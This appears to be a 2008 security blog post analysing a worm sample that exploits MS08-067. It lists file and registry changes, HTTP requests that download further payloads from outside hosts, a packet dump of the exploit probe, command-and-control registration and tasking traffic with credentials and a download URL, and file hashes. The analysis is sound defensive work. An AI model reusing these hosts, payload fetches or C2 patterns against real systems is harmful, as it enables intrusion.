Sunday, November 9, 2008

MS08-067 and W32.Wecorl

On 2 November 2008, Symantec reported a “worm” called W32.Wercol that attempted to exploit the Microsoft Windows Server Service RPC Handling Remote Code Execution Vulnerability (MS08-067). The following provides analysis for the W32.Wercol malware variant 10wrjcenew.exe.

In a lab test, the malware 10wrjcenew.exe:

Created C:\DOCUME~1\%user profile%\LOCALS~1\Temp\Install.2008.dat
Deleted C:\WINDOWS\System32\Dllcache\Svchost.exe
Modified C:\WINDOWS\System32\Svchost.exe
Created C:\WINDOWS\system32\7DBF6DA4

The following registry keys were created:

HKEY_LOCAL_MACHINE\SOFTWARE\Google "[MAC ADDRESS]"
Type: REG_BINARY
Data: (data too large: 3584 bytes)
HKEY_LOCAL_MACHINE\SOFTWARE\Licenses "[MAC ADDRESS]"
Type: REG_BINARY
Data: [HEXADECIMAL DATA]

The malware proceeded to download mimi.1268772 from ls.cc86.info (121.12.172.44, CN) and pp.gif from blog-imgs-27.fc2.com (208.71.107.52, US)

GET /mimi.1268772 HTTP/1.1
Host: ls.cc86.info

GET /u/f/o/ufo2000sgd/pp.gif HTTP/1.1
Host: blog-imgs-27.fc2.com

The malware attempted a MS08-067 buffer overflow exploit against 121.x.x.x UDP port 137

0000 00 0f 66 5e 0e 78 00 0c 29 ec 1c 43 08 00 45 00 ..f^.x..)..C..E.
0010 00 4e 01 02 00 00 80 11 53 af c0 a8 00 0d 79 0c .N......S.....y.
0020 ac 2c 00 89 00 89 00 3a 5a 2d 80 13 00 00 00 01 .,.....:Z-......
0030 00 00 00 00 00 00 20 43 4b 41 41 41 41 41 41 41 ...... CKAAAAAAA
0040 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0050 41 41 41 41 41 41 41 00 00 21 00 01 AAAAAAA..!..

The malware connects to ce.10wrj.com (218.95.101.68, CN) ClientReg.aspx and ClientTask.aspx to register the malware and receive C2 instructions. The sample connection shows a download request for ce.10wrj.com/nb1103.exe.

GET /ClientReg.aspx?mac=xx:xx:xx:xx:xx:xx&Type=0&Sn=081026 HTTP/1.1
Host: ce.10wrj.com

HTTP/1.1 200 OK

xxyysign xxyyMyIP=xx.xx.xx.xx



GET /ClientTask.aspx?mac= xx:xx:xx:xx:xx:xx &Type=0&Sn=081026 HTTP/1.1
Host: ce.10wrj.com

HTTP/1.1 200 OK

xxyysign
xxyyUserNamePassWord=CeUser:CePassWord
xxyyPort=0
xxyyUpdata=http://ce.10wrj.com/nb1103.exe*
xxyyRemoteHost=

The following files were observed during analysis:

10752 f01fd7ecfce8af65832a3a57d2789fa6 10wrjcenew.exe
12800 0f7d9c87b0ce1fa520473119752c6f79 3EDFB6D2
900 14c9db2b8177ca199f283e644fcda225 mimi.1268772
404992 0fdb364e8666140d4570d24f363d26d5 nb1103.exe
258048 944b1a83ee17db7fa779a2e7d970768c pp.gif

No comments: